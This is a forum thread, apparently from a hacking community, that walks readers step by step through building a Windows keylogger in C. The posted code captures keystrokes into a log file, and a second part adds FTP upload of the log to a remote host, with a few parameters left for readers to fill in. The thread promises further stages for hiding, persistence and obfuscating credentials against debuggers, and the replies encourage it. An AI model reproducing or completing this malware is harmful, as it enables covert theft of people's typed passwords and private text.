
Keylogger Development Project



So I've decided to do something a bit different. Instead of just a guide or submitting working code to the code bank, I'm going to try to include as many people as want to take part.

The goal of this project is to familiarize people with C and the MSDN libraries, in a hopefully fun and interactive way.

I've written a basic outline of how to log keys using GetAsyncKeyState. It does not currently work (well, it does, but I won't post it all). Then I left instructions on usage and to-dos for you to fix/add.

The first part I've kept as simple as possible (i.e., you don't need to worry about pointers in this part), and hopefully commented where necessary. Note: It doesn't follow a perfectly sync logic structure, as I tried to show a few different ways to capture keys. Note this should be easy.

Anywho:

Tasks:
* Build a main function and link to the GetKey function.
* Add additional functionality with extra keys.
* Compile and run

Notes: Win XP 32 dev c++ 4.9.9.2 compiled it.

pastebin code http://pastebin.com/m1c84a696

#include <stdio.h>
#include <windows.h>
#include <winuser.h>

/* Log file handle. It is only declared here (extern); the definition lives in
   another translation unit that is not part of this listing. */
extern FILE *out_file;

/*
stdio's keylogger v.01

Compiled on Dev-C++ 4.9.9.2 WinXP 32 Bit

Key Debounce Line ***Just FYI***
while(GetAsyncKeyState(character)==-32768){}

MSDN KEY CODES
http://msdn.microsoft.com/en-us/library/ms927178.aspx

GetAsyncKeyState MSDN Reference
http://msdn.microsoft.com/en-us/library/ms646293(VS.85).aspx

To do: Add Numpad Support, Fnums support, Punctuation.

To use: Build a main function and link to this code.

*/

/*
 * GetKey - one polling pass over the keyboard state.
 *
 * Sleeps 30 ms, then queries GetAsyncKeyState() for virtual-key codes
 * 0x41-0x5A (letters), 0x30-0x39 (top number row) and for VK_ESCAPE,
 * VK_SPACE, VK_RETURN, VK_TAB and VK_BACK. For every key it treats as
 * pressed it opens "data.log" (relative path, mode "a+"), writes a single
 * character or a bracketed tag, and closes the file again.
 *
 * Returns: always 0.
 *
 * -32768 is 0x8000 read as a 16-bit SHORT, i.e. only the most significant
 * bit set; MSDN documents that bit as "key is currently down". The letter
 * and digit loops compare against that exact value, while the special-key
 * checks at the bottom accept any nonzero return.
 *
 * What this looks like from the outside: a process that calls
 * GetAsyncKeyState for several dozen key codes roughly every 30 ms, and a
 * file in its working directory that grows by one to six bytes per key event
 * with a separate open/close pair for each write. API-call monitoring and
 * file-activity monitoring can both surface that pattern.
 */
int GetKey()
{
    short character;
    Sleep(30);
    
    /*ALPHA CHARACTERS V_KEY*/
    /* Virtual-key codes 0x41..0x5A coincide with ASCII 'A'..'Z'. */
    for (character=0x41;character <= 0x5A;character++)
    {
        if (GetAsyncKeyState(character)==-32768)
        {    
             out_file = fopen("data.log","a+");
             /*UPPERCASE*/
             /* Taken when the VK_LSHIFT query returns nonzero. */
             if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_LSHIFT))
             {                           
                   /* Busy-wait (no sleep) until the key state stops reading as -32768. */
                   while(GetAsyncKeyState(character)==-32768){}
                   fputc(character, out_file);
                   fclose(out_file);
             }
             /*LOWERCASE*/
             else 
             {
                   while(GetAsyncKeyState(character)==-32768){}
                   /* +0x20 maps ASCII 'A'..'Z' onto 'a'..'z'. */
                   fputc(character+0x20, out_file);
                   fclose(out_file);
             }
           
        }  
    }
    
    /*Numerical Row*/
    /* Virtual-key codes 0x30..0x39 coincide with ASCII '0'..'9'. */
    for (character=0x30;character <= 0x39;character++)
    {
        if (GetAsyncKeyState(character)==-32768)
        {    
             out_file = fopen("data.log","a+");
             
             /*Map Keys to Special Characters*/
             if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT))
             {                           
                   while(GetAsyncKeyState(character)==-32768){}
                   /* Hard-coded shifted symbols for the digit row; every case
                      writes its symbol and closes the file itself. */
                   switch(character)
                   {
                        case(0x31):
                                  fputs("!", out_file);
                                  fclose(out_file);
                                  break;
                        
                        case(0x32):
                                  fputs("@", out_file);
                                  fclose(out_file);
                                  break;
                        
                        case(0x33):
                                  fputs("#", out_file);
                                  fclose(out_file);
                                  break;
                        
                        case(0x34):
                                  fputs("$", out_file);
                                  fclose(out_file);
                                  break;
                        
                        case(0x35):
                                  fputs("%", out_file);
                                  fclose(out_file);
                                  break;
                        
                        case(0x36):
                                  fputs("^", out_file);
                                  fclose(out_file);
                                  break;
                        
                        case(0x37):
                                  fputs("&", out_file);
                                  fclose(out_file);
                                  break;
                        
                        case(0x38):
                                  fputs("*", out_file);
                                  fclose(out_file);
                                  break;
                        
                        case(0x39):
                                  fputs("(", out_file);
                                  fclose(out_file);
                                  break;
                        
                        case(0x30):
                                  fputs(")", out_file);
                                  fclose(out_file);
                                  break;
                        
                        /* Not reachable from this loop: all ten values of
                           'character' have a case above. */
                        default:
                                fputs("Error\n", out_file);
                                fclose(out_file);
                                break;
                   }
                                
             }
             /*Defaulted Numbers*/
             else
             {
                 while(GetAsyncKeyState(character)==-32768){}
                 fputc(character, out_file);
                 fclose(out_file);
             }
           
        }  
    }
      
    /* Catch Single Special Keys */
    /* Each check below fires on any nonzero GetAsyncKeyState() result and
       writes a fixed string to data.log. */
    if (GetAsyncKeyState(VK_ESCAPE))
    {
       while(GetAsyncKeyState(VK_RETURN)==-32768){} 
       out_file = fopen("data.log","a+");
       fputs("[ESC]", out_file); 
       fclose(out_file);
    }

    if (GetAsyncKeyState(VK_SPACE))
    {
       while(GetAsyncKeyState(VK_SPACE)==-32768){}
       out_file = fopen("data.log","a+");
       fputs(" ", out_file); 
       fclose(out_file);
    }
    
    if (GetAsyncKeyState(VK_RETURN))
    {
       while(GetAsyncKeyState(VK_RETURN)==-32768){}
       out_file = fopen("data.log","a+");
       fputs("\n", out_file); 
       fclose(out_file);
    }
    
    if (GetAsyncKeyState(VK_TAB))
    {
       while(GetAsyncKeyState(VK_TAB)==-32768){}
       out_file = fopen("data.log","a+");
       fputs("[TAB]", out_file); 
       fclose(out_file);
    }

    
    if (GetAsyncKeyState(VK_BACK))
    {
       while(GetAsyncKeyState(VK_BACK)==-32768){}
       out_file = fopen("data.log","a+");
       fputs("[BACK]", out_file); 
       fclose(out_file);
    }
    
    return 0;
}
       

       

I will update it with different things to do (hiding, persistence, sockets, etc) and add it here when I feel like it. Maybe a day or a month … who knows.



LEVEL 2

First I would like to hear feedback – positive/negative/indifferent/easy/hard/interesting/boring/etc. If many people just dont care either way Ill stop.

Now for part 2

I've added a few functions that send logs over FTP when the file size hits 2048 bytes (~1 page).

Hopefully, if you are following along, you have a main function that records keys to a file. So here's what you get this time.

Objectives are again stated in the file, but for some redundancy here they are again:
* Use the MSDN reference http://msdn.microsoft.com/en-us/library/aa384180(VS.85).aspx to fill in missing parameters
* Set up an ftp server or use a free web host (x10hosting is the one I used)
* Find wininet compile flag (won't compile without it)
* Update main function accordingly (I have provided a flowchart that my program follows)
* Compile and run

http://pastebin.com/m1ccbcd69

#include <stdio.h>
#include <wininet.h>
#include <time.h>

/*Part 2
Sending logs
fill in the missing details using
http://msdn.microsoft.com/en-us/library/aa384180%28VS.85%29.aspx 
find the linker compile flag for wininet wont compile without it
Use program flow provided and update main function accordingly.
*/

/* Forward declarations for two of the routines defined further down. */
int SendLogs();
int TimeStamp();

/* Log file handle; declared extern, so its definition is in another file. */
extern FILE *out_file;

/*Declare Time Variables*/
/* File-scope scratch state that both SendLogs() and TimeStamp() overwrite:
   't' holds the value from time(), 'local' the pointer from localtime(). */
struct tm *local;
time_t t;


/*
 * SendLogs - upload data.log to a remote host over FTP using WinINet.
 *
 * The listing is deliberately incomplete as posted: the host is the literal
 * "<ftphost>", two InternetConnect() arguments are "what goes here?"
 * placeholders, and the FtpPutFile() transfer-type argument is only a comment,
 * so the function does not compile in this form.
 *
 * Returns 1 when FtpPutFile() reports failure (data.log is left as it is),
 * otherwise calls TimeStamp() and returns 0.
 *
 * What the visible calls imply for someone examining a binary or a network
 * capture: the session is opened with a NULL agent string and
 * INTERNET_OPEN_TYPE_DIRECT, the connection goes to INTERNET_DEFAULT_FTP_PORT
 * with INTERNET_SERVICE_FTP, and FTP carries its login and the file contents
 * unencrypted. The strings passed to InternetConnect() are ordinary string
 * literals in this source.
 */
int SendLogs()
{
    /* Refresh the shared time state; asctime(local) is used below as the
       remote file name. */
    t = time(NULL);
    local = localtime(&t);
    
    HINTERNET hInternet;
    HINTERNET hConnect; 
    HINTERNET lRes;   /* declared but never used in this function */
    bool pass;

    /* Neither handle is checked before it is passed to the next call. */
    hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
    hConnect = InternetConnect(hInternet,"<ftphost>",INTERNET_DEFAULT_FTP_PORT,"what goes here?", "what goes here?", INTERNET_SERVICE_FTP,0,0);                           
    pass = FtpPutFile(hConnect,"data.log",asctime(local),/*Find correct transfer type*/,0);
                                
    /* Both handles are released before the upload result is examined. */
    InternetCloseHandle(hConnect);
    InternetCloseHandle(hInternet);

    if(pass==false)return 1; //If send fails, it will loop again, Not clearing the Log
    TimeStamp(); // If sends start new log with Time Stamp
    return 0;
}

/*
 * CheckSize - measure data.log and hand it to SendLogs() once it is larger
 * than 2048 bytes (~1 page).
 *
 * The fopen() mode string is a placeholder left by the author, so the
 * function is incomplete as posted. The size is taken by seeking to the end
 * of the file and reading the position with ftell().
 *
 * Returns 1 after calling SendLogs() (whose own return value is ignored),
 * 0 when the file is at or below the threshold.
 *
 * Because of the threshold, each upload carries a file of a little over
 * 2 KB, which gives the outbound transfers a fairly uniform size.
 */
int CheckSize()
{
    int size;
    out_file = fopen("data.log","<how should we open this??>");
    fseek(out_file, 0L, SEEK_END);
    size = ftell(out_file);   /* byte offset of end-of-file, i.e. the file size */
    fseek(out_file, 0L, SEEK_SET);
    fclose(out_file);
    if (size > 2048)
    {
             SendLogs();
             return 1; //debugging will stop keylogger after 1 send
    }
    return 0;
}
/*
 * TimeStamp - start a fresh data.log with a time banner.
 *
 * Updates the file-scope 't'/'local' pair with the current local time,
 * reopens data.log in "w+" mode (which discards whatever it held) and writes
 * a three-line banner containing the asctime() string. Always returns 0.
 */
int TimeStamp()
{
    static const char banner_top[] = "------Start Logging Time ------\n";
    static const char banner_bottom[] = "-------------------------------\n\n";

    /* time() stores the current calendar time through its argument. */
    time(&t);
    local = localtime(&t);

    out_file = fopen("data.log", "w+");
    fputs(banner_top, out_file);
    fputs(asctime(local), out_file);
    fputs(banner_bottom, out_file);
    fclose(out_file);

    return 0;
}

At this point you should have a basic logger that sends data over FTP to your host.

UPCOMING TASKS: simple string encryption so username/passwords/ftphosts aren't plainly available under a debugger. Runtime CRC (cyclic redundancy check) and fail function.



This sounds like a great project, but unfortunately I don't know C right now :(. As for those who do know C, not sure why they don't seem interested…..



This is great, stdio! I did the same thing to check the file size using fseek() and ftell(). Seeing as I'm completely unfamiliar with sockets for Windows, I just used cURL for the FTP upload part. Can't wait to see how hiding the password/username is done, as well as the CRC.



This is pretty nice, I would say. Gives a simplicity that C doesn't usually have.